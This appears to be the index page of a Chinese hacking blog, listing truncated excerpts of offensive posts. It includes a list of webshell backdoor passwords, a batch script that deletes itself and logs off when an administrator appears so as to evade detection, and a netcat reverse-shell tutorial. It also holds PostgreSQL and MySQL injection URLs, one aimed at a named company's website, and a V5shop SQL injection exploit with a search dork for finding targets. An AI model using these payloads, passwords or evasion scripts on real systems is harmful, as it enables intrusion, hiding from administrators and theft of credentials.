常见的黑客们的后门密码

  r00ts小组 密码:r00ts   组超强功能修正去后门加强S-U提权版 密码hkk007   火狐asp木马(超强版)” 华夏五周年庆典版 密码wrsk   **(中国数据) 密码rinima   asp 黑客→kissy 密码ceshi2009   Evil sadness 密码5201314   F.S.T 联盟交流群内部版.!别外传噢 密码rfkl   username 密码8473...

- 阅读全文 -

ASP探测本地端口之MSWINSCK.OCX方案

这个方法很鸡肋,需要服务器有编程环境,mswinsck属于VB控件,装了VC或者VS也行,否则是没有注册的。作为一种思路吧。 MSWINSCK.OCX里的方法可以用来主动连接,但是可能由于本人的ASP功底不够吧,始终没有实现使用Connect方法探测任意IP地址的端口,希望有高人能够写出来代码并能共享出来。 测试环境:Windows 2003 企业版 SP2 IIS 6.0 测试代码: <%...

- 阅读全文 -

内网嗅探自我保护用到的批处理

检测管理员上线就注销自已:   @echo off   :check   choice /C YN /T 10 /D Y   quser find "#16" && del xx.bat logoff   goto check   #16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。   ----...

- 阅读全文 -

使用NC反弹Shell

今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下! 使用NC反弹Shell 在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。 在Windows下反弹CmdShell时...

- 阅读全文 -

PostgreSQL 注入整理

5432端口 /*order by猜字段数*/ http://webshell.cc/detail.php?id=236+order+by+26-- /*判断postgresql数据库*/ http://webshell.cc/detail.php?id=236+and+1::int=1-- /*通过cast类型转换来暴postgresql信息*/ http://webshell.cc/detai...

- 阅读全文 -

php+MySql高级注入中国龙芯cpu公司网站

注入点,注入点猜解字段数目,这些我就不介绍了。注入的时候from猜不出表段名来,可以看这里:http://bbs.blackbap.org/viewthread.php?tid=1215 如果知道了表段名出不来字段名,可以看这里: http://bbs.blackbap.org/viewthread.php?tid=1220 除了这两种,本文再介绍两种MySql的高级注入语句。 先说一个最简单的c...

- 阅读全文 -

V5shop注入漏洞

漏洞危害:高危 一、漏洞文件:cart.aspx 搜索关键词:inurl:scoreindex.aspx exp : /cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as ...

- 阅读全文 -

OneFileCMS v1.1.1多重远程缺陷及修复

标题: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities 作者: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ 下载地址: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip 测试版本: OneFi...

- 阅读全文 -